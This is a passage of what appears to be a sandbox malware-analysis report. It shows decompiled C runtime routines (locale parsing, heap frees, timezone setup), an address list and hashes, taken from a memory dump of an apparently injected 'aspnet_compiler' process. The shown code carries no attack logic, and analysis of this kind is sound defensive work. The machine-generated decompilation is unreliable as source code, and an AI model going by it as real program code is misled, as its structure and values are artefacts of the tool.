									_t33 = _t443 + 0x24; // 0x30ff0c46
									__eflags =  *_t33;
									if( *_t33 != 0) {
										asm("lock xadd [eax], edi");
										__eflags = _t434 == 1;
										if(_t434 == 1) {
											_t34 = _t443 + 0x24; // 0x30ff0c46
											E00445002( *_t34);
										}
									}
									 *(_t443 + 0x24) = 0;
									 *(_t443 + 0x1c) = 0;
									 *(_t443 + 0x28) = 0;
									 *((intOrPtr*)(_t443 + 0x20)) = 0;
									_t39 = _t443 + 0x40; // 0x10468b00
									_t240 =  *_t39;
								} else {
									_t20 = _t443 + 0x28; // 0x30ff068b
									_t437 = _t427 | 0xffffffff;
									_t491 =  *_t20;
									if(_t491 != 0) {
										asm("lock xadd [ecx], eax");
										if(_t491 == 0) {
											_t21 = _t443 + 0x28; // 0x30ff068b
											E00445002( *_t21);
										}
									}
									_t22 = _t443 + 0x24; // 0x30ff0c46
									if( *_t22 != 0) {
										asm("lock xadd [eax], edi");
										if(_t437 == 1) {
											_t23 = _t443 + 0x24; // 0x30ff0c46
											E00445002( *_t23);
										}
									}
									 *(_t443 + 0x24) =  *(_t443 + 0x24) & 0x00000000;
									_t26 = _t357 + 4; // 0x4
									_t240 = _t26;
									 *(_t443 + 0x1c) =  *(_t443 + 0x1c) & 0x00000000;
									 *(_t443 + 0x28) = _t357;
									 *((intOrPtr*)(_t443 + 0x20)) = _t240;
								}
								goto L20;
							}
							goto L130;
						}
						asm("sbb eax, eax");
						_t340 = _t339 | 0x00000001;
						__eflags = _t340;
						goto L10;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E0043A5E8();
					asm("int3");
					_push(_t461);
					_t463 = _t471;
					_t472 = _t471 - 0x1d0;
					_t247 =  *0x46f00c; // 0x54ba778e
					_v56 = _t247 ^ _t463;
					_t249 = _v40;
					_push(_t357);
					_push(_t443);
					_t444 = _v36;
					_push(_t427);
					_t428 = _v44;
					_v508 = _t428;
					__eflags = _t249;
					if(_t249 == 0) {
						_v456 = 1;
						_v468 = 0;
						_t359 = 0;
						_v452 = 0;
						__eflags = _t444;
						if(__eflags == 0) {
							L79:
							E004435FC(_t359, _t370, _t420, _t428, _t444, __eflags, _t428);
							goto L80;
						} else {
							__eflags =  *_t444 - 0x4c;
							if( *_t444 != 0x4c) {
								L58:
								_push(0);
								_t255 = E004431C4(_t359, _t420, _t428, _t444, _t444,  &_v276, 0x83,  &_v448, 0x55);
								_t474 = _t472 + 0x18;
								__eflags = _t255;
								if(_t255 != 0) {
									_t370 = 0;
									__eflags = 0;
									_t76 = _t428 + 0x20; // 0x442deb
									_t421 = _t76;
									_t446 = 0;
									_v452 = _t421;
									do {
										__eflags = _t446;
										if(_t446 == 0) {
											L73:
											_t256 = _v456;
										} else {
											_t374 =  *_t421;
											_t257 =  &_v276;
											while(1) {
												__eflags =  *_t257 -  *_t374;
												_t428 = _v464;
												if( *_t257 !=  *_t374) {
													break;
												}
												__eflags =  *_t257;
												if( *_t257 == 0) {
													L66:
													_t370 = 0;
													_t258 = 0;
												} else {
													_t422 =  *((intOrPtr*)(_t257 + 2));
													__eflags = _t422 -  *((intOrPtr*)(_t374 + 2));
													_v458 = _t422;
													_t421 = _v452;
													if(_t422 !=  *((intOrPtr*)(_t374 + 2))) {
														break;
													} else {
														_t257 = _t257 + 4;
														_t374 = _t374 + 4;
														__eflags = _v458;
														if(_v458 != 0) {
															continue;
														} else {
															goto L66;
														}
													}
												}
												L68:
												__eflags = _t258;
												if(_t258 == 0) {
													_t359 = _t359 + 1;
													__eflags = _t359;
													goto L73;
												} else {
													_t259 =  &_v276;
													_push(_t259);
													_push(_t446);
													_push(_t428);
													L83();
													_t421 = _v452;
													_t474 = _t474 + 0xc;
													__eflags = _t259;
													if(_t259 == 0) {
														_t370 = 0;
														_t256 = 0;
														_v456 = 0;
													} else {
														_t359 = _t359 + 1;
														_t370 = 0;
														goto L73;
													}
												}
												goto L74;
											}
											asm("sbb eax, eax");
											_t258 = _t257 | 0x00000001;
											_t370 = 0;
											__eflags = 0;
											goto L68;
										}
										L74:
										_t446 = _t446 + 1;
										_t421 = _t421 + 0x10;
										_v452 = _t421;
										__eflags = _t446 - 5;
									} while (_t446 <= 5);
									__eflags = _t256;
									if(__eflags != 0) {
										goto L79;
									} else {
										__eflags = _t359;
										goto L77;
									}
								}
								goto L80;
							} else {
								__eflags =  *(_t444 + 2) - 0x43;
								if( *(_t444 + 2) != 0x43) {
									goto L58;
								} else {
									__eflags =  *((short*)(_t444 + 4)) - 0x5f;
									if( *((short*)(_t444 + 4)) != 0x5f) {
										goto L58;
									} else {
										while(1) {
											_t261 = E0044F967(_t444, 0x45b568);
											_t361 = _t261;
											_v472 = _t361;
											_pop(_t376);
											__eflags = _t361;
											if(_t361 == 0) {
												break;
											}
											_t263 = _t261 - _t444;
											__eflags = _t263;
											_v456 = _t263 >> 1;
											if(_t263 == 0) {
												break;
											} else {
												_t265 = 0x3b;
												__eflags =  *_t361 - _t265;
												if( *_t361 == _t265) {
													break;
												} else {
													_t431 = _v456;
													_t362 = 0x45b42c;
													_v460 = 1;
													do {
														_t266 = E0044F92D( *_t362, _t444, _t431);
														_t472 = _t472 + 0xc;
														__eflags = _t266;
														if(_t266 != 0) {
															goto L45;
														} else {
															_t377 =  *_t362;
															_t420 = _t377 + 2;
															do {
																_t334 =  *_t377;
																_t377 = _t377 + 2;
																__eflags = _t334 - _v468;
															} while (_t334 != _v468);
															_t376 = _t377 - _t420 >> 1;
															__eflags = _t431 - _t377 - _t420 >> 1;
															if(_t431 != _t377 - _t420 >> 1) {
																goto L45;
															}
														}
														break;
														L45:
														_v460 = _v460 + 1;
														_t362 = _t362 + 0xc;
														__eflags = _t362 - 0x45b45c;
													} while (_t362 <= 0x45b45c);
													_t359 = _v472 + 2;
													_t267 = E0044F8DD(_t376, _t359, ";");
													_t428 = _v464;
													_t447 = _t267;
													_pop(_t380);
													__eflags = _t447;
													if(_t447 != 0) {
														L48:
														__eflags = _v460 - 5;
														if(_v460 > 5) {
															_t268 = _v452;
															goto L54;
														} else {
															_push(_t447);
															_t270 = E0044E949(_t380,  &_v276, 0x83, _t359);
															_t475 = _t472 + 0x10;
															__eflags = _t270;
															if(_t270 != 0) {
																L82:
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																E0043A5E8();
																asm("int3");
																_push(_t463);
																_t465 = _t475;
																_t273 =  *0x46f00c; // 0x54ba778e
																_v556 = _t273 ^ _t465;
																_push(_t359);
																_t364 = _v540;
																_push(_t447);
																_push(_t428);
																_t432 = _v544;
																_v1292 = _t364;
																_v1276 = E00446A95(_t364, _t380, _t420) + 0x278;
																_push( &_v1256);
																_t280 = E004431C4(_t364, _t420, _t432, _v536, _v536,  &_v820, 0x83,  &_v1248, 0x55);
																_t477 = _t475 - 0x2e4 + 0x18;
																__eflags = _t280;
																if(_t280 != 0) {
																	_t101 = _t364 + 2; // 0x6
																	_t450 = _t101 << 4;
																	__eflags = _t450;
																	_t281 =  &_v280;
																	_v724 = _t450;
																	_t381 =  *((intOrPtr*)(_t450 + _t432));
																	while(1) {
																		_v712 = _v712 & 0x00000000;
																		__eflags =  *_t281 -  *_t381;
																		_t452 = _v724;
																		if( *_t281 !=  *_t381) {
																			break;
																		}
																		__eflags =  *_t281;
																		if( *_t281 == 0) {
																			L91:
																			_t282 = _v712;
																		} else {
																			_t459 =  *((intOrPtr*)(_t281 + 2));
																			__eflags = _t459 -  *((intOrPtr*)(_t381 + 2));
																			_v718 = _t459;
																			_t452 = _v724;
																			if(_t459 !=  *((intOrPtr*)(_t381 + 2))) {
																				break;
																			} else {
																				_t281 = _t281 + 4;
																				_t381 = _t381 + 4;
																				__eflags = _v718;
																				if(_v718 != 0) {
																					continue;
																				} else {
																					goto L91;
																				}
																			}
																		}
																		L93:
																		__eflags = _t282;
																		if(_t282 != 0) {
																			_t382 =  &_v280;
																			_t424 = _t382 + 2;
																			do {
																				_t283 =  *_t382;
																				_t382 = _t382 + 2;
																				__eflags = _t283 - _v712;
																			} while (_t283 != _v712);
																			_v728 = (_t382 - _t424 >> 1) + 1;
																			_t286 = E00444A38(_t382 - _t424 >> 1, 4 + ((_t382 - _t424 >> 1) + 1) * 2);
																			_v740 = _t286;
																			__eflags = _t286;
																			if(_t286 == 0) {
																				goto L84;
																			} else {
																				_v732 =  *((intOrPtr*)(_t452 + _t432));
																				_t125 = _t364 * 4; // 0xcea3
																				_v744 =  *((intOrPtr*)(_t432 + _t125 + 0xa0));
																				_t128 = _t432 + 8; // 0x8b56ff8b
																				_v748 =  *_t128;
																				_t391 =  &_v280;
																				_v720 = _t286 + 4;
																				_t290 = E004463E1(_t286 + 4, _v728,  &_v280);
																				_t479 = _t477 + 0xc;
																				__eflags = _t290;
																				if(_t290 != 0) {
																					_t291 = _v712;
																					_push(_t291);
																					_push(_t291);
																					_push(_t291);
																					_push(_t291);
																					_push(_t291);
																					E0043A5E8();
																					asm("int3");
																					_t293 =  *0x470518; // 0x0
																					return _t293;
																				} else {
																					__eflags = _v280 - 0x43;
																					 *((intOrPtr*)(_t452 + _t432)) = _v720;
																					if(_v280 != 0x43) {
																						L102:
																						_t296 = E00442ED1(_t364, _t391, _t432,  &_v708);
																						_t393 = _v712;
																						 *(_t432 + 0xa0 + _t364 * 4) = _t296;
																					} else {
																						__eflags = _v278;
																						if(_v278 != 0) {
																							goto L102;
																						} else {
																							_t393 = _v712;
																							 *(_t432 + 0xa0 + _t364 * 4) = _t393;
																						}
																					}
																					__eflags = _t364 - 2;
																					if(_t364 != 2) {
																						__eflags = _t364 - 1;
																						if(_t364 != 1) {
																							__eflags = _t364 - 5;
																							if(_t364 == 5) {
																								 *((intOrPtr*)(_t432 + 0x14)) = _v716;
																							}
																						} else {
																							 *((intOrPtr*)(_t432 + 0x10)) = _v716;
																						}
																					} else {
																						_t457 = _v736;
																						_t425 = _t393;
																						_t403 = _t457;
																						 *(_t432 + 8) = _v716;
																						_v720 = _t457;
																						_v728 = _t457[8];
																						_v716 = _t457[9];
																						while(1) {
																							_t154 = _t432 + 8; // 0x8b56ff8b
																							__eflags =  *_t154 -  *_t403;
																							if( *_t154 ==  *_t403) {
																								break;
																							}
																							_t458 = _v720;
																							_t425 = _t425 + 1;
																							_t328 =  *_t403;
																							 *_t458 = _v728;
																							_v716 = _t403[1];
																							_t403 = _t458 + 8;
																							 *((intOrPtr*)(_t458 + 4)) = _v716;
																							_t364 = _v752;
																							_t457 = _v736;
																							_v728 = _t328;
																							_v720 = _t403;
																							__eflags = _t425 - 5;
																							if(_t425 < 5) {
																								continue;
																							} else {
																							}
																							L110:
																							__eflags = _t425 - 5;
																							if(__eflags == 0) {
																								_t178 = _t432 + 8; // 0x8b56ff8b
																								_t319 = E0044F9AC(_t364, _t425, _t432, _t457, __eflags, _v712, 1, 0x45b4e8, 0x7f,  &_v536,  *_t178, 1);
																								_t479 = _t479 + 0x1c;
																								__eflags = _t319;
																								_t320 = _v712;
																								if(_t319 == 0) {
																									_t457[1] = _t320;
																								} else {
																									do {
																										 *(_t465 + _t320 * 2 - 0x20c) =  *(_t465 + _t320 * 2 - 0x20c) & 0x000001ff;
																										_t320 = _t320 + 1;
																										__eflags = _t320 - 0x7f;
																									} while (_t320 < 0x7f);
																									_t323 = E004358BA( &_v536,  *0x46f170, 0xfe);
																									_t479 = _t479 + 0xc;
																									__eflags = _t323;
																									_t457[1] = 0 | _t323 == 0x00000000;
																								}
																								_t193 = _t432 + 8; // 0x8b56ff8b
																								 *_t457 =  *_t193;
																							}
																							 *(_t432 + 0x18) = _t457[1];
																							goto L121;
																						}
																						__eflags = _t425;
																						if(_t425 != 0) {
																							 *_t457 =  *(_t457 + _t425 * 8);
																							_t457[1] =  *(_t457 + 4 + _t425 * 8);
																							 *(_t457 + _t425 * 8) = _v728;
																							 *(_t457 + 4 + _t425 * 8) = _v716;
																						}
																						goto L110;
																					}
																					L121:
																					_t297 = _t364 * 0xc;
																					_t200 = _t297 + 0x45b428; // 0x40f943
																					 *0x4574c8(_t432);
																					_t299 =  *((intOrPtr*)( *_t200))();
																					_t396 = _v732;
																					__eflags = _t299;
																					if(_t299 == 0) {
																						__eflags = _t396 - 0x46f2a8;
																						if(_t396 != 0x46f2a8) {
																							_t456 = _t364 + _t364;
																							__eflags = _t456;
																							asm("lock xadd [eax], ecx");
																							if(_t456 != 0) {
																								goto L126;
																							} else {
																								_t218 = _t456 * 8; // 0x30ff068b
																								E00445002( *((intOrPtr*)(_t432 + _t218 + 0x28)));
																								_t221 = _t456 * 8; // 0x30ff0c46
																								E00445002( *((intOrPtr*)(_t432 + _t221 + 0x24)));
																								_t224 = _t364 * 4; // 0xcea3
																								E00445002( *((intOrPtr*)(_t432 + _t224 + 0xa0)));
																								_t399 = _v712;
																								 *((intOrPtr*)(_v724 + _t432)) = _t399;
																								 *(_t432 + 0xa0 + _t364 * 4) = _t399;
																							}
																						}
																						_t397 = _v740;
																						 *_t397 = 1;
																						 *((intOrPtr*)(_t432 + 0x28 + (_t364 + _t364) * 8)) = _t397;
																					} else {
																						 *(_v724 + _t432) = _t396;
																						_t205 = _t364 * 4; // 0xcea3
																						E00445002( *((intOrPtr*)(_t432 + _t205 + 0xa0)));
																						 *(_t432 + 0xa0 + _t364 * 4) = _v744;
																						E00445002(_v740);
																						 *(_t432 + 8) = _v748;
																						goto L84;
																					}
																					goto L85;
																				}
																			}
																		} else {
																			goto L85;
																		}
																		goto L130;
																	}
																	asm("sbb eax, eax");
																	_t282 = _t281 | 0x00000001;
																	__eflags = _t282;
																	goto L93;
																} else {
																	L84:
																	__eflags = 0;
																	L85:
																	__eflags = _v16 ^ _t465;
																	return E004338BB(_v16 ^ _t465);
																}
															} else {
																_t330 = _t447 + _t447;
																__eflags = _t330 - 0x106;
																if(_t330 >= 0x106) {
																	E004339EF();
																	goto L82;
																} else {
																	 *((short*)(_t463 + _t330 - 0x10c)) = 0;
																	_t332 =  &_v276;
																	_push(_t332);
																	_push(_v460);
																	_push(_t428);
																	L83();
																	_t472 = _t475 + 0xc;
																	__eflags = _t332;
																	_t268 = _v452;
																	if(_t332 != 0) {
																		_t268 = _t268 + 1;
																		_v452 = _t268;
																	}
																	L54:
																	_t444 = _t359 + _t447 * 2;
																	_t370 = 0;
																	__eflags =  *_t444;
																	if( *_t444 == 0) {
																		L56:
																		__eflags = _t268;
																		L77:
																		if(__eflags != 0) {
																			goto L79;
																		} else {
																		}
																		goto L80;
																	} else {
																		_t444 = _t444 + 2;
																		__eflags =  *_t444;
																		if( *_t444 != 0) {
																			continue;
																		} else {
																			goto L56;
																		}
																	}
																}
															}
														}
													} else {
														_t333 = 0x3b;
														__eflags =  *_t359 - _t333;
														if( *_t359 != _t333) {
															break;
														} else {
															goto L48;
														}
													}
												}
											}
											goto L130;
										}
										goto L80;
									}
								}
							}
						}
					} else {
						__eflags = _t444;
						if(_t444 != 0) {
							_push(_t444);
							_push(_t249);
							_push(_t428);
							L83();
						}
						L80:
						__eflags = _v12 ^ _t463;
						return E004338BB(_v12 ^ _t463);
					}
				}
				L130:
			}






































































































































                    0x004435fc
                    0x004435ff
                    0x00443601
                    0x00443604
                    0x00443605
                    0x0044360e
                    0x00443616
                    0x00443618
                    0x0044361a
                    0x0044361d
                    0x00443736
                    0x0044373b
                    0x00443623
                    0x00443623
                    0x00443624
                    0x00443624
                    0x00443627
                    0x0044362a
                    0x0044362c
                    0x0044362f
                    0x0044362f
                    0x00443632
                    0x00443634
                    0x00443637
                    0x0044363c
                    0x0044364a
                    0x00443654
                    0x00443657
                    0x0044365a
                    0x0044365a
                    0x00443665
                    0x0044366a
                    0x0044366f
                    0x00000000
                    0x00443675
                    0x00443678
                    0x00443678
                    0x0044367b
                    0x0044367d
                    0x00443680
                    0x00443680
                    0x00443680
                    0x00443682
                    0x00443682
                    0x00443682
                    0x00443688
                    0x00000000
                    0x00000000
                    0x0044368d
                    0x004436a4
                    0x004436a4
                    0x0044368f
                    0x0044368f
                    0x00443697
                    0x00000000
                    0x00443699
                    0x00443699
                    0x0044369c
                    0x004436a2
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004436a2
                    0x00443697
                    0x004436ad
                    0x004436b2
                    0x004436b4
                    0x004436b9
                    0x004436bc
                    0x004436bf
                    0x004436c2
                    0x004436c5
                    0x004436c7
                    0x004436cc
                    0x004436d6
                    0x004436de
                    0x004436e6
                    0x00000000
                    0x004436ec
                    0x004436f0
                    0x0044373d
                    0x00443743
                    0x00443746
                    0x00443749
                    0x0044374b
                    0x0044374f
                    0x00443753
                    0x00443755
                    0x00443758
                    0x0044375d
                    0x00443753
                    0x0044375e
                    0x00443761
                    0x00443763
                    0x00443765
                    0x00443769
                    0x0044376a
                    0x0044376c
                    0x0044376f
                    0x00443774
                    0x0044376a
                    0x00443777
                    0x0044377a
                    0x0044377d
                    0x00443780
                    0x00443783
                    0x00443783
                    0x004436f2
                    0x004436f2
                    0x004436f5
                    0x004436f8
                    0x004436fa
                    0x004436fe
                    0x00443702
                    0x00443704
                    0x00443707
                    0x0044370c
                    0x00443702
                    0x0044370d
                    0x00443712
                    0x00443714
                    0x00443719
                    0x0044371b
                    0x0044371e
                    0x00443723
                    0x00443719
                    0x00443724
                    0x00443728
                    0x00443728
                    0x0044372b
                    0x0044372f
                    0x00443732
                    0x00443732
                    0x00000000
                    0x00443735
                    0x00000000
                    0x004436e6
                    0x004436a8
                    0x004436aa
                    0x004436aa
                    0x00000000
                    0x004436aa
                    0x0044378a
                    0x0044378b
                    0x0044378c
                    0x0044378d
                    0x0044378e
                    0x0044378f
                    0x00443794
                    0x00443797
                    0x00443798
                    0x0044379a
                    0x004437a0
                    0x004437a7
                    0x004437aa
                    0x004437ad
                    0x004437ae
                    0x004437af
                    0x004437b2
                    0x004437b3
                    0x004437b6
                    0x004437bc
                    0x004437be
                    0x004437e3
                    0x004437ed
                    0x004437f3
                    0x004437f5
                    0x004437fb
                    0x004437fd
                    0x00443a50
                    0x00443a51
                    0x00000000
                    0x00443803
                    0x00443803
                    0x00443807
                    0x0044396e
                    0x0044396e
                    0x00443985
                    0x0044398a
                    0x0044398d
                    0x0044398f
                    0x00443995
                    0x00443995
                    0x00443997
                    0x00443997
                    0x0044399a
                    0x0044399c
                    0x004439a2
                    0x004439a2
                    0x004439a4
                    0x00443a2b
                    0x00443a2b
                    0x004439aa
                    0x004439aa
                    0x004439ac
                    0x004439b2
                    0x004439b5
                    0x004439b8
                    0x004439be
                    0x00000000
                    0x00000000
                    0x004439c0
                    0x004439c4
                    0x004439ed
                    0x004439ed
                    0x004439ef
                    0x004439c6
                    0x004439c6
                    0x004439ca
                    0x004439ce
                    0x004439d5
                    0x004439db
                    0x00000000
                    0x004439dd
                    0x004439dd
                    0x004439e0
                    0x004439e3
                    0x004439eb
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004439eb
                    0x004439db
                    0x004439fa
                    0x004439fa
                    0x004439fc
                    0x00443a2a
                    0x00443a2a
                    0x00000000
                    0x004439fe
                    0x004439fe
                    0x00443a04
                    0x00443a05
                    0x00443a06
                    0x00443a07
                    0x00443a0c
                    0x00443a12
                    0x00443a15
                    0x00443a17
                    0x00443a1e
                    0x00443a20
                    0x00443a22
                    0x00443a19
                    0x00443a19
                    0x00443a1a
                    0x00000000
                    0x00443a1a
                    0x00443a17
                    0x00000000
                    0x004439fc
                    0x004439f3
                    0x004439f5
                    0x004439f8
                    0x004439f8
                    0x00000000
                    0x004439f8
                    0x00443a31
                    0x00443a31
                    0x00443a32
                    0x00443a35
                    0x00443a3b
                    0x00443a3b
                    0x00443a44
                    0x00443a46
                    0x00000000
                    0x00443a48
                    0x00443a48
                    0x00000000
                    0x00443a48
                    0x00443a46
                    0x00000000
                    0x0044380d
                    0x0044380d
                    0x00443812
                    0x00000000
                    0x00443818
                    0x00443818
                    0x0044381d
                    0x00000000
                    0x00443823
                    0x00443823
                    0x00443829
                    0x0044382e
                    0x00443830
                    0x00443837
                    0x00443838
                    0x0044383a
                    0x00000000
                    0x00000000
                    0x00443840
                    0x00443840
                    0x00443844
                    0x0044384a
                    0x00000000
                    0x00443850
                    0x00443852
                    0x00443853
                    0x00443856
                    0x00000000
                    0x0044385c
                    0x0044385c
                    0x00443862
                    0x00443867
                    0x00443871
                    0x00443875
                    0x0044387a
                    0x0044387d
                    0x0044387f
                    0x00000000
                    0x00443881
                    0x00443881
                    0x00443883
                    0x00443886
                    0x00443886
                    0x00443889
                    0x0044388c
                    0x0044388c
                    0x00443897
                    0x00443899
                    0x0044389b
                    0x00000000
                    0x00000000
                    0x0044389b
                    0x00000000
                    0x0044389d
                    0x0044389d
                    0x004438a3
                    0x004438a6
                    0x004438a6
                    0x004438b4
                    0x004438bd
                    0x004438c2
                    0x004438c8
                    0x004438cb
                    0x004438cc
                    0x004438ce
                    0x004438dc
                    0x004438dc
                    0x004438e3
                    0x00443944
                    0x00000000
                    0x004438e5
                    0x004438e5
                    0x004438f3
                    0x004438f8
                    0x004438fb
                    0x004438fd
                    0x00443a6d
                    0x00443a6f
                    0x00443a70
                    0x00443a71
                    0x00443a72
                    0x00443a73
                    0x00443a74
                    0x00443a79
                    0x00443a7c
                    0x00443a7d
                    0x00443a85
                    0x00443a8c
                    0x00443a8f
                    0x00443a90
                    0x00443a93
                    0x00443a97
                    0x00443a98
                    0x00443a9b
                    0x00443aab
                    0x00443ab7
                    0x00443ace
                    0x00443ad3
                    0x00443ad6
                    0x00443ad8
                    0x00443aed
                    0x00443af0
                    0x00443af0
                    0x00443af3
                    0x00443af9
                    0x00443b02
                    0x00443b04
                    0x00443b07
                    0x00443b0e
                    0x00443b11
                    0x00443b17
                    0x00000000
                    0x00000000
                    0x00443b19
                    0x00443b1d
                    0x00443b46
                    0x00443b46
                    0x00443b1f
                    0x00443b1f
                    0x00443b23
                    0x00443b27
                    0x00443b2e
                    0x00443b34
                    0x00000000
                    0x00443b36
                    0x00443b36
                    0x00443b39
                    0x00443b3c
                    0x00443b44
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00443b44
                    0x00443b34
                    0x00443b53
                    0x00443b53
                    0x00443b55
                    0x00443b5b
                    0x00443b61
                    0x00443b64
                    0x00443b64
                    0x00443b67
                    0x00443b6a
                    0x00443b6a
                    0x00443b7a
                    0x00443b88
                    0x00443b8d
                    0x00443b94
                    0x00443b96
                    0x00000000
                    0x00443b9c
                    0x00443ba2
                    0x00443ba8
                    0x00443baf
                    0x00443bb5
                    0x00443bb8
                    0x00443bbe
                    0x00443bcb
                    0x00443bd2
                    0x00443bd7
                    0x00443bda
                    0x00443bdc
                    0x00443e35
                    0x00443e3b
                    0x00443e3c
                    0x00443e3d
                    0x00443e3e
                    0x00443e3f
                    0x00443e40
                    0x00443e45
                    0x00443e46
                    0x00443e4b
                    0x00443be2
                    0x00443be2
                    0x00443bf0
                    0x00443bf3
                    0x00443c0e
                    0x00443c15
                    0x00443c1b
                    0x00443c21
                    0x00443bf5
                    0x00443bf5
                    0x00443bfd
                    0x00000000
                    0x00443bff
                    0x00443bff
                    0x00443c05
                    0x00443c05
                    0x00443bfd
                    0x00443c28
                    0x00443c2b
                    0x00443d48
                    0x00443d4b
                    0x00443d58
                    0x00443d5b
                    0x00443d63
                    0x00443d63
                    0x00443d4d
                    0x00443d53
                    0x00443d53
                    0x00443c31
                    0x00443c31
                    0x00443c37
                    0x00443c3f
                    0x00443c41
                    0x00443c44
                    0x00443c4d
                    0x00443c56
                    0x00443c5c
                    0x00443c5c
                    0x00443c5f
                    0x00443c61
                    0x00000000
                    0x00000000
                    0x00443c63
                    0x00443c69
                    0x00443c6a
                    0x00443c75
                    0x00443c7d
                    0x00443c85
                    0x00443c88
                    0x00443c8b
                    0x00443c91
                    0x00443c97
                    0x00443c9d
                    0x00443ca3
                    0x00443ca6
                    0x00000000
                    0x00000000
                    0x00443ca8
                    0x00443ccd
                    0x00443ccd
                    0x00443cd0
                    0x00443cd4
                    0x00443ced
                    0x00443cf2
                    0x00443cf5
                    0x00443cf7
                    0x00443cfd
                    0x00443d38
                    0x00443cff
                    0x00443cff
                    0x00443d04
                    0x00443d0c
                    0x00443d0d
                    0x00443d0d
                    0x00443d24
                    0x00443d2b
                    0x00443d2e
                    0x00443d33
                    0x00443d33
                    0x00443d3b
                    0x00443d3e
                    0x00443d3e
                    0x00443d43
                    0x00000000
                    0x00443d43
                    0x00443caa
                    0x00443cac
                    0x00443cb1
                    0x00443cb7
                    0x00443cc0
                    0x00443cc9
                    0x00443cc9
                    0x00000000
                    0x00443cac
                    0x00443d66
                    0x00443d66
                    0x00443d6a
                    0x00443d72
                    0x00443d78
                    0x00443d7b
                    0x00443d81
                    0x00443d83
                    0x00443dc3
                    0x00443dc9
                    0x00443dd0
                    0x00443dd0
                    0x00443dd6
                    0x00443dda
                    0x00000000
                    0x00443ddc
                    0x00443ddc
                    0x00443de0
                    0x00443de5
                    0x00443de9
                    0x00443dee
                    0x00443df5
                    0x00443e03
                    0x00443e09
                    0x00443e0c
                    0x00443e0c
                    0x00443dda
                    0x00443e1b
                    0x00443e23
                    0x00443e2c
                    0x00443d85
                    0x00443d8b
                    0x00443d8e
                    0x00443d95
                    0x00443da7
                    0x00443dae
                    0x00443dbb
                    0x00000000
                    0x00443dbb
                    0x00000000
                    0x00443d83
                    0x00443bdc
                    0x00443b57
                    0x00000000
                    0x00443b57
                    0x00000000
                    0x00443b55
                    0x00443b4e
                    0x00443b50
                    0x00443b50
                    0x00000000
                    0x00443ada
                    0x00443ada
                    0x00443ada
                    0x00443adc
                    0x00443ae1
                    0x00443aec
                    0x00443aec
                    0x00443903
                    0x00443903
                    0x00443906
                    0x0044390b
                    0x00443a68
                    0x00000000
                    0x00443911
                    0x00443913
                    0x0044391b
                    0x00443921
                    0x00443922
                    0x00443928
                    0x00443929
                    0x0044392e
                    0x00443931
                    0x00443933
                    0x00443939
                    0x0044393b
                    0x0044393c
                    0x0044393c
                    0x0044394a
                    0x0044394a
                    0x0044394d
                    0x0044394f
                    0x00443952
                    0x00443960
                    0x00443960
                    0x00443a4a
                    0x00443a4a
                    0x00000000
                    0x00443a4c
                    0x00443a4c
                    0x00000000
                    0x00443954
                    0x00443954
                    0x00443957
                    0x0044395a
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0044395a
                    0x00443952
                    0x0044390b
                    0x004438fd
                    0x004438d0
                    0x004438d2
                    0x004438d3
                    0x004438d6
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004438d6
                    0x004438ce
                    0x00443856
                    0x00000000
                    0x0044384a
                    0x00000000
                    0x00443967
                    0x0044381d
                    0x00443812
                    0x00443807
                    0x004437c0
                    0x004437c0
                    0x004437c2
                    0x004437c4
                    0x004437c5
                    0x004437c6
                    0x004437c7
                    0x004437cc
                    0x00443a57
                    0x00443a5c
                    0x00443a67
                    0x00443a67
                    0x004437be
                    0x00000000

                    APIs
                      • Part of subcall function 00444A38: RtlAllocateHeap.NTDLL(00000000,00433B6F,?,P@,00437117,?,?,00000000,?,P@,0040D366,00433B6F,?,?,?,?), ref: 00444A6A
                    • _free.LIBCMT ref: 00443707
                    • _free.LIBCMT ref: 0044371E
                    • _free.LIBCMT ref: 0044373D
                    • _free.LIBCMT ref: 00443758
                    • _free.LIBCMT ref: 0044376F
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$AllocateHeap
                    • String ID:
                    • API String ID: 3033488037-0
                    • Opcode ID: b7604e1a15de5c4975e1a22ca13a47cbde8c9eaf56ddf4bc19a35e3347dcf454
                    • Instruction ID: 33fd527e9c34fc99befeee23a18cff77bba5ae58738d28a8d8759c9d181ac574
                    • Opcode Fuzzy Hash: b7604e1a15de5c4975e1a22ca13a47cbde8c9eaf56ddf4bc19a35e3347dcf454
                    • Instruction Fuzzy Hash: 1F51F6B1A00705AFEB20DF2AC841A6AB7F4EF45B25F14416FE849D7351E739DA01CB88
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00447BE5 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 69%
                    			E00447BE5(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				int _v8;
				int _v12;
				int _v16;
				int _v20;
				signed int _v56;
				char _v268;
				intOrPtr _v272;
				char _v276;
				char _v312;
				char _v316;
				void* __ebp;
				void* _t36;
				signed int _t38;
				signed int _t42;
				signed int _t50;
				void* _t54;
				void* _t56;
				signed int* _t61;
				intOrPtr _t71;
				void* _t78;
				signed int _t85;
				signed int _t87;
				signed int _t89;
				int _t93;
				char** _t96;
				signed int _t100;
				signed int _t101;
				signed int _t106;
				signed int _t107;
				intOrPtr _t116;
				intOrPtr _t118;

				_t88 = __edi;
				_t96 = E0044764F();
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_t36 = E004476AD( &_v8);
				_pop(_t78);
				if(_t36 != 0) {
					L19:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E0043A5E8();
					asm("int3");
					_t106 = _t107;
					_t38 =  *0x46f00c; // 0x54ba778e
					_v56 = _t38 ^ _t106;
					 *0x46f344 =  *0x46f344 | 0xffffffff;
					 *0x46f338 =  *0x46f338 | 0xffffffff;
					_push(0);
					_push(_t96);
					_t77 = "TZ";
					_t89 = 0;
					 *0x470758 = 0;
